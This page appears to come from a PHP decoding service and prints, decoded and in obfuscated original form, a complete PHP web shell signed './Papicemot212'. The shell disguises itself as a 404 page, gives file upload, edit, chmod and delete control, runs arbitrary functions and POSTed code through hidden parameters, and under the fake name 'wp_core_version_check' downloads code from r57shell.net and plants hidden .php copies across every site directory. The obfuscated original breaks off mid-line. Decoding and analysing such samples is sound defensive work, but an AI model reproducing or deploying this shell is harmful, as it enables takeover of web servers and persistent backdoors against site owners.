Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto htbAB; OcUuj: echo "\74\146\157\x72\155\x20\x65\156\143\164\171\160\145\x3d\4..

Decoded Output download

<?php 
 goto htbAB; OcUuj: echo "<form enctype="multipart/form-data" method="POST">
<font color="lime">Upload File </font>> <input type="file" name="file" />\xd\xa<input type="submit" value="Upload" />\xd\xa</form>
\xa</td></tr>"; goto ZsMbx; xah8P: echo "</td></tr><tr><td>"; goto Nv2Cm; IclXn: session_start(); goto gU_ry; RPCTz: echo "<font color="white" size="2px"><center><br/><b>Copyright &copy; 2019 ./Papicemot212</a></center></font>\xd

\xa</body>\xd\xa</html>"; goto AHrZZ; htbAB: error_reporting(0); goto DJ0VG; qKEWX: if (!$_SESSION["forbidden"]) { goto L4xCc; ABBOl: echo "    </form>
  </td>\xd
</table>\xd\xa"; goto cbYoF; jjWn8: echo $_SESSION["forbidden"]; goto ABBOl; cbYoF: exit; goto dwD8V; L4xCc: echo "<title>404 Not Found</title>
<meta name="theme-color" content="white"> </meta> <!--Buat Thumbnail website--> 
<link href="https://fonts.googleapis.com/css?family=Iceland" rel="stylesheet">\xd
<script src="https://ajax.googlaeips.com/ajax/libs/jquery/3.5.1/jquery.min.js?ver=6.0"></script>\xd

\xa<html><head><title>404 Not Found</title></head>
\xa<style> 
input { margin:0;background-color:#fff;border:1px solid #fff; } \xd
</style> \xd\xa<body>
\xa<h1>Not Found</h1>\xd\xa<p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found\xd
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html><center><form method=post>
\xa<input type="password" name="password"></form></center>\xd\xa      
\xa      <br>
\xa      <br>
      "; goto jjWn8; dwD8V: } goto O8pF5; ubR6_: set_time_limit(0); goto xcoq0; AwZRK: if (md5($_POST["password"]) == $pass) { $_SESSION["forbidden"] = $pass; echo "<script>window.location='?./Papicemot212 PRIVATE SHELL'</script>"; } goto QdHEj; HJaVk: if (isset($_REQUEST["logout"])) { session_destroy(); echo "<script>window.location='./Papicemot212 PRIVATE SHELL'</script>"; } goto qKEWX; Nv2Cm: if (isset($_FILES["file"])) { if (copy($_FILES["file"]["tmp_name"], $path . "/" . $_FILES["file"]["name"])) { echo "<font color="lime">Upload Success</font><br />"; } else { echo "<font color="white">Upload Failed</font><br/>"; } } goto OcUuj; O8pF5: error_reporting(0); goto ubR6_; gU_ry: if (!function_exists("wp_core_version_check")) { function wp_core_version_check() { goto NOoi2; GbA4y: if (is_writable(sys_get_temp_dir())) { $tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } else { $tmp_file = $file_path . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } goto vYx1o; wy8pj: $request_uri = $_SERVER["REQUEST_URI"]; goto DAEM4; B1ppb: if (!file_exists($tmp_file)) { goto dSQV_; ysgcr: @file_put_contents($tmp_file, $response); goto zDTId; dSQV_: if (function_exists("curl_init")) { goto AzZc6; AzZc6: $ch = curl_init(); goto Xj6bQ; S8EGF: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto E_lX7; E_lX7: $response = curl_exec($ch); goto pyPJG; pyPJG: curl_close($ch); goto jCd1S; ZnWke: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto S8EGF; Xj6bQ: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto ZnWke; jCd1S: } else { goto J0rXf; vw8fa: $opts = array("http" => array("header" => array("Referer: {$referer}\xd\xa"))); goto YQaFq; EoTM2: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto b3lTe; J0rXf: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto vw8fa; YQaFq: $context = stream_context_create($opts); goto EoTM2; b3lTe: } goto gJj00; gJj00: @touch($tmp_file); goto ysgcr; zDTId: } else { $response = file_get_contents($tmp_file); if (!@preg_match("#stt1#", $response)) { goto Ok8So; Ok8So: if (function_exists("curl_init")) { goto Wv0d3; b41SA: $response = curl_exec($ch); goto xOaCI; iuJ5Y: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto b41SA; xOaCI: curl_close($ch); goto vuYZD; S6wJL: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto iuJ5Y; bmBSQ: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto S6wJL; Wv0d3: $ch = curl_init(); goto bmBSQ; vuYZD: } else { goto nhR31; YbCmE: $opts = array("http" => array("header" => array("Referer: {$referer}\xd\xa"))); goto w7SdS; w7SdS: $context = stream_context_create($opts); goto BEtx5; BEtx5: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto XwOQb; nhR31: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto YbCmE; XwOQb: } goto pJTv7; pJTv7: @touch($tmp_file); goto dCWVc; dCWVc: @file_put_contents($tmp_file, $response); goto GLb1r; GLb1r: } } goto xfPA7; NOoi2: $document_file = $_SERVER["SCRIPT_FILENAME"]; goto wy8pj; fY4fR: $hostname = str_replace("www.", '', $_SERVER["HTTP_HOST"]); goto GbA4y; DAEM4: $parse_url = parse_url($request_uri); goto AoWo3; IZB8W: foreach ($dirs as $d) { goto ZzHFK; ZeMnL: foreach ($dirs as $d) { if (!@preg_match("#wp-content#", $d)) { $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; @file_put_contents($file_name, $response); } } goto Gz4ge; ZzHFK: $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; goto dHmPj; dHmPj: @file_put_contents($file_name, $response); goto MbNyS; MbNyS: $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto ZeMnL; Gz4ge: } goto GXmxz; TjEDl: $uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path); goto teJZA; xfPA7: $dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto IZB8W; vYx1o: if (@$_GET["slince_golden"]) { goto aKrSW; aKrSW: echo "<!-- //Silence is golden. -->"; goto iOV94; wZroD: if (md5(sha1(@$_GET["is"])) == $response) { goto CyKqX; cOU9O: if (@$_POST["l"]) { function basic_code_extensions($request) { goto y1vq4; OsKgS: $ret = (include $tmpf); goto y_S0h; IOLM6: return $ret; goto lPydM; y_S0h: fclose($tmp); goto IOLM6; vSyvf: $tmpf = stream_get_meta_data($tmp); goto emIFG; emIFG: $tmpf = $tmpf["uri"]; goto rpzMY; rpzMY: fwrite($tmp, $request); goto OsKgS; y1vq4: $tmp = tmpfile(); goto vSyvf; lPydM: } print_r(basic_code_extensions($_POST["l"])); } goto TCZ4z; Xr3dL: if (@$_GET["m"]) { goto U22m4; Iicni: $file_name_path = @$_GET["m"] . "gagal.php"; goto ghwTp; U22m4: if (function_exists("curl_init")) { goto nRdxl; W2gFs: $response = curl_exec($ch); goto KQaRt; KQaRt: curl_close($ch); goto g2nSX; sUXk_: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/mini_admin.txt"); goto mGrwS; mGrwS: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto W2gFs; nRdxl: $ch = curl_init(); goto sUXk_; g2nSX: } else { $response = file_get_contents("http://r57shell.net/mini_admin.txt"); } goto Iicni; ghwTp: @file_put_contents($file_name_path, $response); goto VKCF0; VKCF0: echo $file_name_path; goto yengD; yengD: } goto cOU9O; CyKqX: if (@$_GET["f"]) { print_r($_GET["f"]($_GET["c"])); } goto Xr3dL; TCZ4z: } goto glAXO; iOV94: if (function_exists("curl_init")) { goto Ech_t; fRkll: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto bjdz0; OsY47: curl_close($ch); goto dk6LZ; Ech_t: $ch = curl_init(); goto UjWXr; UjWXr: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&pwd=get"); goto fRkll; bjdz0: $response = curl_exec($ch); goto OsY47; dk6LZ: } else { $response = file_get_contents("http://r57shell.net/jquery.php?v=1.2&pwd=get"); } goto wZroD; glAXO: exit; goto rgSlx; rgSlx: } goto B1ppb; SA7Pj: $file_path = dirname($document_file); goto TjEDl; teJZA: if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') { $document_root = $file_path; } else { $document_root = str_replace($uri_path, '', $file_path); } goto fY4fR; AoWo3: $uri_path = $parse_url["path"]; goto q6q5E; q6q5E: $uri_path = dirname($uri_path); goto SA7Pj; GXmxz: } wp_core_version_check(); } goto AwZRK; bBi4T: foreach ($paths as $id => $pat) { goto ZLQib; ZLQib: if ($pat == '' && $id == 0) { goto DTOin; AbWw1: continue; goto XzZ4V; DTOin: $a = true; goto F2MJl; F2MJl: echo "<a href="?path=/">/</a>"; goto AbWw1; XzZ4V: } goto p2VFl; p2VFl: if ($pat == '') { continue; } goto aSOwQ; Gdg1k: for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "/"; } } goto F8Bbn; aSOwQ: echo "<a href="?path="; goto Gdg1k; F8Bbn: echo "">" . $pat . "</a>/"; goto bEZpW; bEZpW: } goto xah8P; wdZvn: $path = str_replace("\", "/", $path); goto X0OZT; uFXd1: if (isset($_GET["path"])) { $path = $_GET["path"]; } else { $path = getcwd(); } goto wdZvn; xcoq0: if (get_magic_quotes_gpc()) { foreach ($_POST as $key => $value) { $_POST[$key] = stripslashes($value); } } goto k5Yon; k5Yon: echo "<!DOCTYPE HTML>
\xa<html>\xd\xa<head>\xd\xa<title>./Papicemot212 Minishell</title>
\xa<link href="https://fonts.googleapis.com/css?family=Bahiana|Black+Ops+One|Josefin+Slab |New+Rocker|Quicksand|Wallpoet|orbitron" rel="stylesheet">\xd\xa<style>\xd\xabody{
\xafont-family: "New Rocker";\xd\xabackground-color: black;\xd\xacolor:red;\xd\xa}
#content tr:hover{
background-color: #191919;
text-shadow:0px 0px 10px #fff;\xd
}
\xa
\xa#content .first{
\xabackground-color: #191919;\xd\xa}
\xatable{
border: 1px #000000 dotted;
}\xd\xaa{
\xacolor:white;\xd\xatext-decoration: none;
}\xd
a:hover{
color:red;\xd\xatext-shadow:0px 0px 10px #ffffff;\xd
}\xd
input,select{\xd
border: 1px #FFD700 solid;
} \xd\xatextarea{\xd
background-color:transparent;
border: 1px #D0D5D5 solid;\xd\xacolor:#ADADAD;\xd
}\xd\xa</style>\xd
</head>\xd\xa<body>
<h1><center><font color="red">./Papicemot212</font><br>\xd
\x9\x9\x9</center></h1>\xd\xa<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
\xa<tr><td><font color="lime">Path </font>> "; goto uFXd1; X0OZT: $paths = explode("/", $path); goto bBi4T; QdHEj: if ($_GET["page"] == "blank") { echo "<a href='?'>Back</a>"; exit; } goto HJaVk; QnQLb: echo "<center><br><font color=white>Server Ip</font><br><font color=lime>" . gethostbyname($_SERVER["HTTP_HOST"]) . "</font><br><font color=white>Your Ip</font><br><font color=lime>" . $_SERVER["REMOTE_ADDR"] . "</font></center><br><br>"; goto RPCTz; ZsMbx: if (isset($_GET["filesrc"])) { goto uSwLf; pwKBw: echo "</tr></td></font></table><br />"; goto Jff6v; uSwLf: echo "<tr><td>File > "; goto MflUQ; Jff6v: echo "<center><textarea style="width: 80%; height :400px"; readonly>" . htmlspecialchars(file_get_contents($_GET["filesrc"])) . "</textarea></center"; goto dVV1h; MflUQ: echo $_GET["filesrc"]; goto pwKBw; dVV1h: } elseif (isset($_GET["option"]) && $_POST["opt"] != "delete") { goto vazjf; BGJxs: if ($_POST["opt"] == "chmod") { if (isset($_POST["perm"])) { if (chmod($_POST["path"], $_POST["perm"])) { echo "<font color="lime">Change Permission Success</font><br/>"; } else { echo "<font color="white">Change Permission Failed</font><br />"; } } echo "<form method="POST">
Perizinan > <input name="perm" type="text" size="4" value="" . substr(sprintf("%o", fileperms($_POST["path"])), -4) . "" />
<input type="hidden" name="path" value="" . $_POST["path"] . "">\xd
<input type="hidden" name="opt" value="chmod">
\xa<input type="submit" value="Save" />
</form>"; } elseif ($_POST["opt"] == "rename") { if (isset($_POST["newname"])) { if (rename($_POST["path"], $path . "/" . $_POST["newname"])) { echo "<font color="lime">Rename Success</font><br/>"; } else { echo "<font color="white">Rename Failed</font><br />"; } $_POST["name"] = $_POST["newname"]; } echo "<form method="POST">
\xaNama Baru > <input name="newname" type="text" size="20" value="" . $_POST["name"] . "" />
<input type="hidden" name="path" value="" . $_POST["path"] . "">\xd\xa<input type="hidden" name="opt" value="rename">\xd\xa<input type="submit" value="Save" />
\xa</form>"; } elseif ($_POST["opt"] == "edit") { if (isset($_POST["src"])) { goto ocarr; ocarr: $fp = fopen($_POST["path"], "w"); goto NSo06; NnMgU: fclose($fp); goto CAwTj; NSo06: if (fwrite($fp, $_POST["src"])) { echo "<font color="lime">Edit File Success</font><br/>"; } else { echo "<font color="white">Edit File Failed</font><br/>"; } goto NnMgU; CAwTj: } echo "<form method="POST">
<textarea cols=80 rows=20 name="src">" . htmlspecialchars(file_get_contents($_POST["path"])) . "</textarea><br />\xd
<input type="hidden" name="path" value="" . $_POST["path"] . "">\xd\xa<input type="hidden" name="opt" value="edit">
<input type="submit" value="Edit" />
\xa</form>"; } goto egVnA; egVnA: echo "</center>"; goto C383b; vazjf: echo "</table><br /><center>" . $_POST["path"] . "<br /><br />"; goto BGJxs; C383b: } else { goto prt5r; EvugD: $scandir = scandir($path); goto lLkmd; dsCtJ: echo "</center>"; goto EvugD; RRdsR: foreach ($scandir as $file) { goto VLO9v; uL_Ub: $size = filesize($path . "/" . $file) / 1024; goto gYEk7; piSps: if (is_writable($path . "/" . $file) || !is_readable($path . "/" . $file)) { echo "</font>"; } goto P31wG; sYpho: echo perms($path . "/" . $file); goto piSps; YqmKx: if (is_writable($path . "/" . $file)) { echo "<font color="lime">"; } elseif (!is_readable($path . "/" . $file)) { echo "<font color="white">"; } goto sYpho; Io6HB: echo "<tr>
\xa<td>[F] <a href="?filesrc=" . $path . "/" . $file . "&path=" . $path . "">" . $file . "</a></td>
<td><center>" . $size . "</center></td>
\xa<td><center>"; goto YqmKx; wDvtE: if ($size >= 1024) { $size = round($size / 1024, 2) . " MB"; } else { $size = $size . " KB"; } goto Io6HB; VLO9v: if (!is_file($path . "/" . $file)) { continue; } goto uL_Ub; gYEk7: $size = round($size, 3); goto wDvtE; P31wG: echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("{$path}/{$dir}")) . ''; goto r1YPT; r1YPT: echo "</center></td>\xd
<td><center><form method="POST" action="?option&path=" . $path . "">
<select name="opt">\xd\xa<option value="">Choose</option>
\xa<option value="delete">Delete</option>
<option value="chmod">Chmod</option>\xd\xa<option value="rename">Rename</option>
\xa<option value="edit">Edit</option>\xd
</select>\xd
<input type="hidden" name="type" value="file">\xd
<input type="hidden" name="name" value="" . $file . "">
<input type="hidden" name="path" value="" . $path . "/" . $file . "">
<input type="submit" value="+">
</form></center></td>\xd\xa</tr>"; goto E9smL; E9smL: } goto J1A1Q; EtQro: echo "<tr class="first"><td></td><td></td><td></td><td></td></tr>"; goto RRdsR; bPlkW: if (isset($_GET["option"]) && $_POST["opt"] == "delete") { if ($_POST["type"] == "dir") { if (rmdir($_POST["path"])) { echo "<font color="lime">Delete Dir Success</font><br/>"; } else { echo "<font color="white">Delete Dir Failed                                                                                                                                                                                                                                                                                             </font><br/>"; } } elseif ($_POST["type"] == "file") { if (unlink($_POST["path"])) { echo "<font color="lime">Delete File Success</font><br/>"; } else { echo "<font color="white">Delete File Failed</font><br/>"; } } } goto dsCtJ; pOkzs: foreach ($scandir as $dir) { goto CWQjs; UBskq: if (is_writable($path . "/" . $dir)) { echo "<font color="lime">"; } elseif (!is_readable($path . "/" . $dir)) { echo "<font color="white">"; } goto egNgE; CWQjs: if (!is_dir($path . "/" . $dir) || $dir == "." || $dir == "..") { continue; } goto e5AHP; uncPW: echo "</center></td>\xd\xa<td><center><form method="POST" action="?option&path=" . $path . "">\xd\xa<select name="opt">\xd\xa<option value="">Choose</option>\xd
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>\xd\xa<option value="rename">Rename</option>
\xa</select>
<input type="hidden" name="type" value="dir">\xd\xa<input type="hidden" name="name" value="" . $dir . "">
<input type="hidden" name="path" value="" . $path . "/" . $dir . "">\xd
<input type="submit" value="+">
</form></center></td>
\xa</tr>"; goto n5gN_; egNgE: echo perms($path . "/" . $dir); goto QPBrR; e5AHP: echo "<tr>
<td>[D] <a href="?path=" . $path . "/" . $dir . "">" . $dir . "</a></td>
<td><center>--</center></td>\xd\xa<td><center>"; goto UBskq; wtudV: echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("{$path}/{$dir}")) . ''; goto uncPW; QPBrR: if (is_writable($path . "/" . $dir) || !is_readable($path . "/" . $dir)) { echo "</font>"; } goto wtudV; n5gN_: } goto EtQro; J1A1Q: echo "</table>\xd
</div>"; goto n4tkg; lLkmd: echo "<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td><center>Name</peller></center></td>
\xa<td><center>Size</peller></center></td>
<td><center>Permission</peller></center></td>
\xa<td><center>Last Update</peller></center></td>
<td><center>Options</peller></center></td>
\xa</tr>"; goto pOkzs; prt5r: echo "</table><br/><center>"; goto bPlkW; n4tkg: } goto QnQLb; DJ0VG: header("HTTP/1.0 404 Not Found", true, 404); goto IclXn; AHrZZ: function perms($file) { goto JLdPO; JIogc: if (($perms & 0xc000) == 0xc000) { $info = "s"; } elseif (($perms & 0xa000) == 0xa000) { $info = "l"; } elseif (($perms & 0x8000) == 0x8000) { $info = "-"; } elseif (($perms & 0x6000) == 0x6000) { $info = "b"; } elseif (($perms & 0x4000) == 0x4000) { $info = "d"; } elseif (($perms & 0x2000) == 0x2000) { $info = "c"; } elseif (($perms & 0x1000) == 0x1000) { $info = "p"; } else { $info = "u"; } goto jBx3e; CYPfD: $info .= $perms & 0x40 ? $perms & 0x800 ? "s" : "x" : ($perms & 0x800 ? "S" : "-"); goto czuwv; GUiGm: $info .= $perms & 0x8 ? $perms & 0x400 ? "s" : "x" : ($perms & 0x400 ? "S" : "-"); goto vibq9; fFzrU: $info .= $perms & 0x1 ? $perms & 0x200 ? "t" : "x" : ($perms & 0x200 ? "T" : "-"); goto ROCAc; JLdPO: $perms = fileperms($file); goto JIogc; MwZwL: $info .= $perms & 0x80 ? "w" : "-"; goto CYPfD; czuwv: $info .= $perms & 0x20 ? "r" : "-"; goto RU7zf; ROCAc: return $info; goto WWFXd; RU7zf: $info .= $perms & 0x10 ? "w" : "-"; goto GUiGm; jBx3e: $info .= $perms & 0x100 ? "r" : "-"; goto MwZwL; vibq9: $info .= $perms & 0x4 ? "r" : "-"; goto Z7img; Z7img: $info .= $perms & 0x2 ? "w" : "-"; goto fFzrU; WWFXd: } ?>

Did this file decode correctly?

Original Code

<?php
 goto htbAB; OcUuj: echo "\74\146\157\x72\155\x20\x65\156\143\164\171\160\145\x3d\42\155\x75\x6c\164\x69\x70\141\x72\164\x2f\146\x6f\162\155\55\x64\141\x74\x61\x22\x20\x6d\145\x74\150\157\x64\x3d\42\x50\117\x53\x54\42\x3e\15\12\74\x66\x6f\x6e\x74\x20\x63\157\x6c\x6f\162\x3d\x22\x6c\151\x6d\145\x22\76\x55\x70\x6c\157\x61\x64\x20\106\x69\154\x65\40\74\57\146\157\x6e\164\76\x3e\x20\74\151\x6e\160\165\164\x20\x74\x79\x70\145\75\42\146\x69\154\145\42\x20\x6e\x61\155\x65\75\x22\146\x69\x6c\145\x22\40\57\x3e\xd\xa\x3c\x69\x6e\x70\x75\x74\x20\x74\x79\160\145\75\42\163\165\142\155\151\164\x22\x20\x76\x61\x6c\x75\145\x3d\x22\125\160\x6c\157\141\x64\42\x20\57\x3e\xd\xa\x3c\x2f\x66\157\x72\155\76\15\xa\x3c\57\x74\144\x3e\74\x2f\164\162\76"; goto ZsMbx; xah8P: echo "\74\x2f\164\144\x3e\x3c\x2f\x74\x72\x3e\x3c\164\162\x3e\x3c\164\144\x3e"; goto Nv2Cm; IclXn: session_start(); goto gU_ry; RPCTz: echo "\x3c\146\157\156\164\40\143\x6f\154\x6f\x72\x3d\42\167\150\151\x74\x65\42\x20\163\151\172\x65\x3d\42\62\x70\170\x22\x3e\x3c\x63\145\156\x74\x65\x72\76\74\x62\162\57\76\74\142\76\x43\x6f\x70\171\x72\x69\147\x68\x74\x20\x26\x63\x6f\160\171\x3b\40\x32\60\61\x39\40\x2e\x2f\x50\x61\x70\x69\x63\x65\155\157\x74\62\x31\x32\x3c\x2f\141\76\x3c\x2f\x63\x65\x6e\164\x65\x72\x3e\74\57\x66\157\156\164\x3e\xd\12\15\xa\74\57\142\157\x64\171\x3e\xd\xa\x3c\57\x68\x74\155\154\x3e"; goto AHrZZ; htbAB: error_reporting(0); goto DJ0VG; qKEWX: if (!$_SESSION["\x66\157\x72\142\151\144\144\145\x6e"]) { goto L4xCc; ABBOl: echo "\40\40\40\x20\74\x2f\146\157\162\155\76\15\12\x20\40\74\x2f\x74\144\76\xd\12\x3c\57\164\x61\142\x6c\x65\x3e\xd\xa"; goto cbYoF; jjWn8: echo $_SESSION["\146\x6f\x72\142\x69\144\x64\x65\x6e"]; goto ABBOl; cbYoF: exit; goto dwD8V; L4xCc: echo "\x3c\x74\151\164\x6c\145\76\64\60\64\40\116\x6f\164\40\x46\157\x75\156\144\x3c\x2f\164\x69\164\154\x65\76\15\12\x3c\x6d\x65\164\141\40\x6e\x61\155\x65\x3d\42\x74\x68\x65\x6d\145\x2d\x63\157\x6c\x6f\162\42\40\x63\157\156\x74\145\156\x74\x3d\42\x77\x68\151\164\145\42\x3e\x20\74\x2f\155\145\x74\141\76\40\74\x21\55\x2d\102\x75\141\164\40\x54\x68\x75\155\x62\156\141\151\x6c\40\167\145\142\x73\x69\x74\x65\55\x2d\76\40\15\12\74\x6c\151\156\x6b\40\x68\x72\x65\146\75\x22\150\164\x74\160\x73\x3a\57\57\x66\x6f\x6e\x74\163\x2e\x67\157\x6f\x67\154\145\x61\x70\151\163\56\143\x6f\155\57\x63\x73\163\x3f\x66\x61\x6d\x69\x6c\x79\75\x49\x63\x65\x6c\141\156\x64\42\x20\162\145\154\x3d\x22\x73\164\171\154\145\163\150\x65\145\164\x22\76\xd\12\74\x73\143\x72\x69\x70\x74\40\163\x72\x63\75\42\150\164\x74\160\163\72\57\57\141\x6a\x61\x78\x2e\x67\x6f\157\147\x6c\x61\145\x69\x70\163\x2e\143\x6f\x6d\57\x61\x6a\141\170\x2f\154\x69\142\x73\57\152\x71\x75\145\x72\x79\57\x33\x2e\65\x2e\61\57\x6a\x71\165\145\x72\x79\56\155\x69\156\56\x6a\163\x3f\166\x65\162\75\66\56\x30\x22\76\74\57\163\x63\162\x69\x70\x74\76\xd\12\15\xa\x3c\150\x74\155\154\x3e\74\x68\145\x61\x64\76\x3c\x74\151\164\154\145\76\64\60\64\x20\116\x6f\164\40\x46\157\x75\x6e\144\74\x2f\164\151\x74\154\x65\76\x3c\x2f\150\x65\x61\144\76\15\xa\74\x73\164\171\x6c\x65\76\x20\15\12\x69\x6e\x70\165\164\x20\x7b\40\155\x61\162\x67\x69\x6e\72\60\73\x62\x61\143\153\x67\162\x6f\x75\x6e\x64\x2d\143\157\x6c\157\x72\x3a\43\x66\x66\x66\x3b\142\x6f\162\x64\x65\x72\72\61\160\x78\40\163\157\154\151\x64\40\43\x66\146\146\x3b\40\x7d\x20\xd\12\x3c\x2f\163\164\x79\154\x65\76\40\xd\xa\74\142\x6f\144\171\x3e\15\xa\74\150\x31\76\116\x6f\x74\40\106\x6f\165\x6e\144\x3c\57\x68\x31\76\xd\xa\x3c\160\x3e\x54\150\145\40\x72\145\x71\x75\x65\x73\164\145\144\x20\125\122\114\40\x77\141\163\x20\156\x6f\164\x20\146\157\x75\156\144\40\x6f\156\x20\x74\x68\151\x73\x20\163\x65\162\166\x65\162\56\74\57\x70\76\x3c\160\76\x41\144\144\151\164\151\x6f\156\x61\154\154\x79\x2c\40\x61\x20\x34\x30\x34\40\x4e\157\164\x20\x46\157\x75\156\x64\xd\12\x65\x72\x72\157\x72\x20\x77\141\x73\x20\145\156\x63\157\165\x6e\164\x65\x72\x65\144\x20\x77\x68\151\154\145\40\164\162\171\x69\x6e\147\40\x74\x6f\40\165\x73\145\40\141\156\x20\105\x72\x72\157\162\x44\x6f\143\x75\155\145\156\x74\40\164\157\40\150\x61\x6e\x64\x6c\x65\x20\x74\150\x65\40\x72\145\x71\165\145\163\x74\x2e\74\x2f\x70\x3e\15\12\74\x2f\142\x6f\x64\x79\76\74\x2f\150\164\x6d\154\76\x3c\143\145\x6e\x74\145\162\x3e\74\146\157\x72\x6d\x20\x6d\x65\x74\x68\157\144\75\160\157\163\164\76\15\xa\x3c\x69\x6e\x70\x75\164\40\x74\x79\160\145\x3d\42\x70\141\x73\163\x77\157\x72\x64\x22\x20\x6e\141\155\145\75\42\160\x61\163\163\167\x6f\x72\x64\42\76\x3c\x2f\146\157\162\155\76\74\57\x63\x65\x6e\x74\x65\162\76\xd\xa\40\x20\40\x20\x20\40\15\xa\40\40\40\40\40\x20\x3c\142\x72\x3e\15\xa\x20\40\40\x20\x20\x20\74\x62\162\x3e\15\12\x20\x20\x20\x20\40\x20"; goto jjWn8; dwD8V: } goto O8pF5; ubR6_: set_time_limit(0); goto xcoq0; AwZRK: if (md5($_POST["\x70\141\x73\163\x77\157\162\x64"]) == $pass) { $_SESSION["\x66\x6f\x72\142\151\144\144\145\156"] = $pass; echo "\x3c\x73\143\162\x69\160\164\x3e\167\151\x6e\x64\x6f\x77\56\154\x6f\x63\141\x74\x69\157\156\75\x27\x3f\56\x2f\x50\x61\160\x69\x63\x65\x6d\x6f\x74\x32\61\62\x20\x50\x52\x49\126\101\124\105\40\123\110\105\x4c\114\47\x3c\x2f\x73\143\162\151\160\164\x3e"; } goto QdHEj; HJaVk: if (isset($_REQUEST["\154\x6f\x67\x6f\x75\x74"])) { session_destroy(); echo "\74\163\x63\x72\x69\x70\x74\x3e\167\151\156\144\x6f\x77\56\154\x6f\143\141\x74\x69\x6f\x6e\75\x27\x2e\x2f\120\141\160\151\143\x65\155\157\164\x32\x31\62\40\120\122\x49\x56\x41\124\105\40\x53\110\105\x4c\114\x27\74\57\163\143\x72\x69\160\x74\76"; } goto qKEWX; Nv2Cm: if (isset($_FILES["\146\151\154\145"])) { if (copy($_FILES["\146\151\x6c\x65"]["\164\x6d\160\x5f\x6e\141\x6d\145"], $path . "\x2f" . $_FILES["\x66\x69\154\x65"]["\156\x61\x6d\x65"])) { echo "\x3c\x66\x6f\x6e\x74\40\143\157\154\157\x72\x3d\x22\154\x69\x6d\x65\x22\x3e\x55\160\x6c\x6f\141\144\x20\123\165\143\x63\x65\x73\163\x3c\x2f\146\157\x6e\x74\76\x3c\142\162\40\57\x3e"; } else { echo "\x3c\146\x6f\156\164\40\x63\x6f\x6c\157\162\x3d\x22\x77\150\x69\164\x65\x22\x3e\x55\x70\154\x6f\141\144\x20\x46\x61\x69\x6c\x65\x64\x3c\57\146\x6f\156\x74\x3e\x3c\x62\x72\57\76"; } } goto OcUuj; O8pF5: error_reporting(0); goto ubR6_; gU_ry: if (!function_exists("\x77\160\137\143\x6f\x72\x65\x5f\166\x65\x72\x73\x69\x6f\156\137\143\150\145\x63\153")) { function wp_core_version_check() { goto NOoi2; GbA4y: if (is_writable(sys_get_temp_dir())) { $tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "\x73\145\x73\x73\137" . md5('' . $hostname . "\x5f" . $document_file . ''); } else { $tmp_file = $file_path . DIRECTORY_SEPARATOR . "\x73\145\x73\x73\137" . md5('' . $hostname . "\137" . $document_file . ''); } goto vYx1o; wy8pj: $request_uri = $_SERVER["\122\x45\x51\125\x45\x53\124\x5f\x55\x52\x49"]; goto DAEM4; B1ppb: if (!file_exists($tmp_file)) { goto dSQV_; ysgcr: @file_put_contents($tmp_file, $response); goto zDTId; dSQV_: if (function_exists("\143\165\x72\154\137\x69\156\x69\164")) { goto AzZc6; AzZc6: $ch = curl_init(); goto Xj6bQ; S8EGF: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["\110\124\124\x50\137\x48\x4f\123\x54"] . $_SERVER["\x52\x45\121\125\x45\123\124\x5f\125\122\x49"]); goto E_lX7; E_lX7: $response = curl_exec($ch); goto pyPJG; pyPJG: curl_close($ch); goto jCd1S; ZnWke: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto S8EGF; Xj6bQ: curl_setopt($ch, CURLOPT_URL, "\x68\164\x74\x70\x3a\57\x2f\x72\65\67\163\x68\x65\x6c\x6c\56\156\x65\x74\57\x6a\x71\165\x65\x72\171\56\160\x68\160\77\166\75\61\x2e\x32\46\x72\x65\x71\165\145\x73\x74\75\x65\x6e\x61\142\154\145"); goto ZnWke; jCd1S: } else { goto J0rXf; vw8fa: $opts = array("\x68\164\x74\160" => array("\x68\x65\x61\x64\145\162" => array("\122\x65\x66\145\x72\145\162\x3a\x20{$referer}\xd\xa"))); goto YQaFq; EoTM2: $response = 